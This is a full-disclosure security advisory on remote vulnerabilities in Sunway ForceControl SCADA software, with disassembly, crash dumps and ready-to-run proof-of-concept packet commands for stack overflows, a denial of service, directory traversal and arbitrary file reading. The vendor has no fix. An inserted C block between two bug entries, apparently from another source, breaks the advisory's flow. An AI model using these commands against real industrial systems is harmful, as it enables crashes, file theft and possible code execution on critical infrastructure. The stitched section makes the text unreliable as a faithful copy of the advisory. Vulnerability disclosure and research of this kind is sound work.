#######################################################################

                             Luigi Auriemma

Application:  Sunway ForceControl
              http://www.sunwayland.com.cn/pro.asp
Versions:     <= 6.1 sp3 with AngelServer and WebServer updated
Platforms:    Windows
Bugs:         various stack overflows
              directory traversals
              third party ActiveX code execution
              various Denials of Service
Exploitation: remote
Date:         22 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@xxxxxxxxxxxxx
              web:    aluigi.org

#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


ForceControl is a Chinese SCADA/HMI software package.


#######################################################################

=======
2) Bugs
=======


-----------------------------
A] AngelServer stack overflow
-----------------------------

A signed comparison in the handler of packet 8 of AngelServer leads to a
stack overflow:

  004022E1  > B9 19000000       MOV ECX,19
  004022E6  . 33C0              XOR EAX,EAX
  004022E8  . 8D7C24 24         LEA EDI,DWORD PTR SS:[ESP+24]
  004022EC  . 83FE 64           CMP ESI,64                     ; our value
  004022EF  . F3:AB             REP STOS DWORD PTR ES:[EDI]
  004022F1  . 0F8D E7000000     JGE AngelSer.004023DE          ; signed
  004022F7  . 8BCE              MOV ECX,ESI
  004022F9  . 8D75 0C           LEA ESI,DWORD PTR SS:[EBP+C]
  004022FC  . 8BD1              MOV EDX,ECX
  004022FE  . 8D7C24 24         LEA EDI,DWORD PTR SS:[ESP+24]
  00402302  . C1E9 02           SHR ECX,2                      ; memcpy
  00402305  . F3:A5             REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  00402307  . 8BCA              MOV ECX,EDX
  00402309  . 8D4424 24         LEA EAX,DWORD PTR SS:[ESP+24]
  0040230D  . 83E1 03           AND ECX,3
  00402310  . 50                PUSH EAX
  00402311  . F3:A4             REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
  00402313  . 8B8C24 A0000000   MOV ECX,DWORD PTR SS:[ESP+A0]
  0040231A  . E8 A1FDFFFF       CALL AngelSer.004020C0
  0040231F  . E9 BA000000       JMP AngelSer.004023DE


--------------------------------
B] WebServer directory traversal
--------------------------------

By using a three-dot pattern it is possible to download the files
located on the disk of the project used by WebServer.


--------------------------------------------
C] various Denials of Service in AngelServer
--------------------------------------------

The AngelServer program is affected by various problems that lead to
Denial of Service effects:

- exception handler due to unallocable memory through packet 6
- invalid memory read access during memcpy through packet 6
- whole system reboot through packet 6
- endless loop during the handling of the interfaces through packet 6
- whole system reboot through packet 7


-------------------------------------
D] third party ActiveX code execution
-------------------------------------

This software is bundled with the YRWXls.ocx ActiveX component from
"Cell Software" (BD9E5104-2F20-4A9F-AB14-82D558FF374E, which is the
latest version), and it is affected by a vulnerability in the Login
method:

  eax=886641aa ebx=02c55aac ecx=015ebd5c edx=886641ab esi=886641aa edi=015ebd88
  eip=02c01db2 esp=015ebd10 ebp=02c867c0 iopl=0         nv up ei ng nz na pe nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
  YRWXls!DllRegisterServer+0x2ab62:
  02c01db2 8a08            mov     cl,byte ptr [eax]          ds:0023:886641aa=??
  0:008> gn
  (a1c.e00): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00000000 ebx=00000000 ecx=6ed9b6fc edx=7c8285f6 esi=00000000 edi=00000000
  eip=6ed9b6fc esp=015eb948 ebp=015eb968 iopl=0         nv up ei pl zr na pe nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
  6ed9b6fc ??              ???

No additional research has been performed on the vulnerability; anyway,
in my test it was necessary to load another unsafe ActiveX component
first (tested on Windows 2003).
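Bug A above and bug F below share one root cause: a length taken from the packet is compared or extended as a signed quantity before it drives a memcpy into a fixed stack buffer. The C below is an added example, not code from the advisory or from Sunway; it mirrors the two checks as the disassembly performs them beside hardened unsigned equivalents, and walks the "one size byte, then data" chunk layout assumed from the F listing. The buffer sizes are read off the REP STOS counts, and the sample chunk packets are constructed here.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Buffer sizes implied by the disassembly: MOV ECX,19 / REP STOS clears 25 dwords
 * (100 bytes) in AngelServer, MOV ECX,10 clears 16 dwords (64 bytes) in NetDBServer. */
#define ANGEL_BUF 100
#define CHUNK_BUF  64

/* Bug A as written: CMP ESI,64 / JGE compares the attacker-controlled length as
 * signed, so 0xffffffff is -1 and "fits"; true means the original goes on to memcpy. */
bool angel_len_ok_signed(uint32_t len) { return (int32_t)len < ANGEL_BUF; }

/* Hardened check: unsigned compare against the buffer and against the bytes present. */
bool angel_len_ok_fixed(uint32_t len, size_t avail) {
    return len < ANGEL_BUF && len <= avail;
}

/* Bug F as written: MOVSX sign-extends the 1-byte chunk size, so 0x80..0xff read
 * as small negative lengths and pass a signed bound. */
bool chunk_len_ok_signed(uint8_t raw) { return (int8_t)raw <= CHUNK_BUF; }

/* Hardened walk over the "1-byte size, then data" chunk layout assumed from the F
 * disassembly: zero-extend the size and keep each chunk inside both the destination
 * buffer and the bytes left in the packet. Returns chunks consumed, or -1 on the
 * first malformed chunk. */
int walk_chunks_fixed(const uint8_t *p, size_t avail) {
    uint8_t dst[CHUNK_BUF];
    size_t i = 0;
    int n = 0;
    while (i < avail) {
        size_t len = p[i++];                      /* zero-extended: 0..255 */
        if (len > CHUNK_BUF || len > avail - i) return -1;
        memset(dst, 0, sizeof dst);
        memcpy(dst, p + i, len);
        i += len;                                 /* advance: "concatenate" */
        n++;
    }
    return n;
}

/* Constructed samples (not from the advisory). */
int demo_good_chunks(void) {   /* a 3-byte chunk then a 2-byte chunk -> 2 */
    static const uint8_t pkt[] = { 3, 'a', 'b', 'c', 2, 'd', 'e' };
    return walk_chunks_fixed(pkt, sizeof pkt);
}
int demo_bad_chunks(void) {    /* size byte 0xff, which the original sign-extends to -1 -> -1 */
    static const uint8_t pkt[] = { 0xff, 'a', 'b', 'c' };
    return walk_chunks_fixed(pkt, sizeof pkt);
}
```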
-------------------------------------
E] stack overflow in SNMP NetDBServer
-------------------------------------

Stack overflow caused by the copying of data chunks into a stack buffer:

  0040303A  |. 66:8B40 0A        MOV AX,WORD PTR DS:[EAX+A]       ; chunks
  0040303E  |. 0FBFC0            MOVSX EAX,AX
  00403041  |. 3BC7              CMP EAX,EDI
  00403043  |. 0F8E AC000000     JLE SNMP_Net.004030F5
  00403049  |. 894424 14         MOV DWORD PTR SS:[ESP+14],EAX
  0040304D  |> B9 10000000       /MOV ECX,10
  00403052  |. 33C0              |XOR EAX,EAX
  00403054  |. 8D7C24 2C         |LEA EDI,DWORD PTR SS:[ESP+2C]
  00403058  |. 83C3 02           |ADD EBX,2
  0040305B  |. F3:AB             |REP STOS DWORD PTR ES:[EDI]
  0040305D  |. 8B46 2C           |MOV EAX,DWORD PTR DS:[ESI+2C]
  00403060  |. 43                |INC EBX
  00403061  |. 8D7C24 2C         |LEA EDI,DWORD PTR SS:[ESP+2C]
  00403065  |. 66:8B6C18 FD      |MOV BP,WORD PTR DS:[EAX+EBX-3]  ; chunk num
  0040306A  |. 8A4C18 FF         |MOV CL,BYTE PTR DS:[EAX+EBX-1]  ; chunk size
  0040306E  |. 884C24 20         |MOV BYTE PTR SS:[ESP+20],CL
  00403072  |. 8D3418            |LEA ESI,DWORD PTR DS:[EAX+EBX]
  00403075  |. 8B5424 20         |MOV EDX,DWORD PTR SS:[ESP+20]
  00403079  |. 81E2 FF000000     |AND EDX,0FF
  0040307F  |. 8BCA              |MOV ECX,EDX
  00403081  |. 03DA              |ADD EBX,EDX                     ; concatenate
  00403083  |. 8BC1              |MOV EAX,ECX
  00403085  |. C1E9 02           |SHR ECX,2                       ; memcpy
  00403088  |. F3:A5             |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  0040308A  |. 8BC8              |MOV ECX,EAX
  0040308C  |. 83E1 03           |AND ECX,3
  0040308F  |. F3:A4             |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]


---------------------------------------------
F] integer stack overflow in SNMP NetDBServer
---------------------------------------------

A signed 8-bit value is sign-extended and used as the length of a
memcpy into a stack buffer. Note that also in this case the chunked
data can be concatenated, so there is this other way to exploit the
overflow too:

  00402B78  |. 0FBE2C1A          |MOVSX EBP,BYTE PTR DS:[EDX+EBX]   ; 8bit expansion
  00402B7C  |. F3:AB             |REP STOS DWORD PTR ES:[EDI]
  00402B7E  |. 8BCD              |MOV ECX,EBP
  00402B80  |. 43                |INC EBX
  00402B81  |. 8BC1              |MOV EAX,ECX
  00402B83  |. 8D7C24 20         |LEA EDI,DWORD PTR SS:[ESP+20]
  00402B87  |. 8D341A            |LEA ESI,DWORD PTR DS:[EDX+EBX]
  00402B8A  |. 03DD              |ADD EBX,EBP                       ; concatenate
  00402B8C  |. C1E9 02           |SHR ECX,2                         ; memcpy
  00402B8F  |. F3:A5             |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  00402B91  |. 8BC8              |MOV ECX,EAX
  00402B93  |. 33C0              |XOR EAX,EAX
  00402B95  |. 83E1 03           |AND ECX,3
  00402B98  |. 43                |INC EBX
  00402B99  |. F3:A4             |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]

...and...

  00402B9B  |. 0FBE6C1A FF       |MOVSX EBP,BYTE PTR DS:[EDX+EBX-1]
  00402BA0  |. B9 10000000       |MOV ECX,10
  00402BA5  |. 8D7C24 40         |LEA EDI,DWORD PTR SS:[ESP+40]
  00402BA9  |. F3:AB             |REP STOS DWORD PTR ES:[EDI]
  00402BAB  |. 8BCD              |MOV ECX,EBP
  00402BAD  |. 8D341A            |LEA ESI,DWORD PTR DS:[EDX+EBX]
  00402BB0  |. 8BD1              |MOV EDX,ECX
  00402BB2  |. 8D7C24 40         |LEA EDI,DWORD PTR SS:[ESP+40]
  00402BB6  |. C1E9 02           |SHR ECX,2
  00402BB9  |. F3:A5             |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  00402BBB  |. 8BCA              |MOV ECX,EDX
  00402BBD  |. 8D4424 40         |LEA EAX,DWORD PTR SS:[ESP+40]
  00402BC1  |. 83E1 03           |AND ECX,3
  00402BC4  |. 50                |PUSH EAX
  00402BC5  |. F3:A4             |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]


----------------------------------------
G] Denial of Service in SNMP NetDBServer
----------------------------------------

  00402A0A  |> 8B4B 30           MOV ECX,DWORD PTR DS:[EBX+30]
  00402A0D  |. 83F9 0B           CMP ECX,0B
  00402A10  |. 7C 24             JL SHORT SNMP_Net.00402A36
  00402A12  |. 8B5B 2C           MOV EBX,DWORD PTR DS:[EBX+2C]
  00402A15  |. 8B43 06           MOV EAX,DWORD PTR DS:[EBX+6]
  00402A18  |. 3BC8              CMP ECX,EAX
  00402A1A  |. 7C 1A             JL SHORT SNMP_Net.00402A36        ; signed comparison
  00402A1C  |. 8D5403 FE         LEA EDX,DWORD PTR DS:[EBX+EAX-2]
  00402A20  |. B9 A0704000       MOV ECX,SNMP_Net.004070A
  00402A25  |. 5F                POP EDI
  00402A26  |. 5E                POP ESI
  00402A27  |. 66:8B02           MOV AX,WORD PTR DS:[EDX]          ; invalid access


---------------------------------------
H] Arbitrary files reading in NetServer
---------------------------------------

Through this server it is possible to read any file on any disk or
share. Opcodes 0x00 and 0x04 are used to open the file (the first one
only prepends the full project path to the name, so use directory
traversal with it), while 0x02 is used to read and send its content,
with the possibility of also specifying the offset.

Note that there is also a very limited heap overflow, caused by some
calculations performed on the offset, where it is possible to allocate
a 0-byte buffer for the reply packet, but with only a Denial of
Service effect.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip (version 0.3.3)

A]
  udpsz -T -C "08000000 00000000 ffffffff" -b a SERVER 8800 0x400

B]
  http://SERVER/.../.../.../boot.ini

C]
  udpsz -T -C "06000000 00000000 ffffffff" -b a SERVER 8800 0x400
  udpsz -T -C "06000000 00000000 ffffff00" -b a SERVER 8800 0x400
  udpsz -T -C "06000000 00000000 00040000" -b a SERVER 8800 0x400
  udpsz -T -C "06000000 00000000 00040000" -c "2147483647," -b a SERVER 8800 0x400
  udpsz -T -C "07000000 00000000 00000000" SERVER 8800 0x400

D]
  http://aluigi.org/poc/yrwxls_1.zip

E]
  udpsz -C "eb50eb50 5300 ffff0000 0100 ffff ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff

F]
  udpsz -C "eb50eb50 5700 ffff0000 0100 ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff

G]
  udpsz -C "eb50eb50 0000 80808080" -T SERVER 2001 0xb

H]
  udpsz -D -1 -C "8888888888888888 00010000 01000000 04000000 633a5c626f6f742e696e69" 0 -C "8888888888888888 1c000000 01000000 02000000 00000000 ffffff7f" -1 -T SERVER 2006 0x11c


#######################################################################

======
4) Fix
======


No fix.


#######################################################################


---
Luigi Auriemma
http://aluigi.org